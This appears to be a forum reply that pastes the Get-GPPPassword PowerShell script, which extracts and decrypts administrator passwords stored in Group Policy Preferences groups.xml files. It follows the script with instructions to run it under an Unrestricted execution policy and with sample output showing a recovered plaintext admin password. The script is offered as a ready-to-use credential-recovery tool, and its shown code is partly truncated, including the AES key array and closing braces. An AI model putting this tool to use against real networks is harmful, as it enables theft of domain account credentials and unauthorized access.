You don't need to edit the script at all. I've just tried it and it worked as is;
Copy it to some .ps1 file:
function Get-GPPPassword {
Get-GPPPassword retrieves the plaintext password for accounts pushed through Group Policy in groups.xml.
Author: Chris Campbell (@obscuresec)
License: GNU GPL v2
Get-GPPPassword imports the encoded and encrypted password string from groups.xml and then decodes and decrypts the plaintext password.
.Parameter Path
The path to the targeted groups.xml file.
Get-GPPPassword -path c:\demo\groups.xml
Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $Path = "$PWD\groups.xml" )
#Function to pull encrypted password string from groups.xml
function Parse-cPassword {
try {
[xml] $Xml = Get-Content ($Path)
[String] $Cpassword = $Xml.Groups.User.Properties.cpassword
} catch { Write-Error "No Password Policy Found in File!" }
return $Cpassword
#Function to look to see if the administrator account is given a newname
function Parse-NewName {
[xml] $Xml = Get-Content ($Path)
[String] $NewName = $Xml.Groups.User.Properties.newName
return $NewName
#Function to parse out the Username whose password is being specified
function Parse-UserName {
try {
[xml] $Xml = Get-Content ($Path)
[string] $UserName = $Xml.Groups.User.Properties.userName
} catch { Write-Error "No Username Specified in File!" }
return $UserName
#Function that decodes and decrypts password
function Decrypt-Password {
try {
#Append appropriate padding based on string length
$Pad = "=" * (4 - ($Cpassword.length % 4))
$Base64Decoded = [Convert]::FromBase64String($Cpassword + $Pad)
#Create a new AES .NET Crypto Object
$AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
#Static Key from
[Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
#Set IV to all nulls (thanks Matt) to prevent dynamic generation of IV value
$AesIV = New-Object Byte[]($AesObject.IV.Length)
$AesObject.IV = $AesIV
$AesObject.Key = $AesKey
$DecryptorObject = $AesObject.CreateDecryptor()
[Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
} catch { Write-Error "Decryption Failed!" }
$Cpassword = Parse-cPassword
$Password = Decrypt-Password
$NewName = Parse-NewName
$UserName = Parse-UserName
$Results = New-Object System.Object
Add-Member -InputObject $Results -type NoteProperty -name UserName -value $UserName
Add-Member -InputObject $Results -type NoteProperty -name NewName -value $NewName
Add-Member -InputObject $Results -type NoteProperty -name Password -value $Password
return $Results
Launch your PS (on that machine I have to change the execution policy to Unrestricted)
From your cmd:
PowerShell -ExecutionPolicy Unrestricted
PS > .\yourfile.ps1 Groups.xml
It should return you:
UserName NewName Password
------------ ------------ ------------
Administrator (built-in) L0c@LAdm!n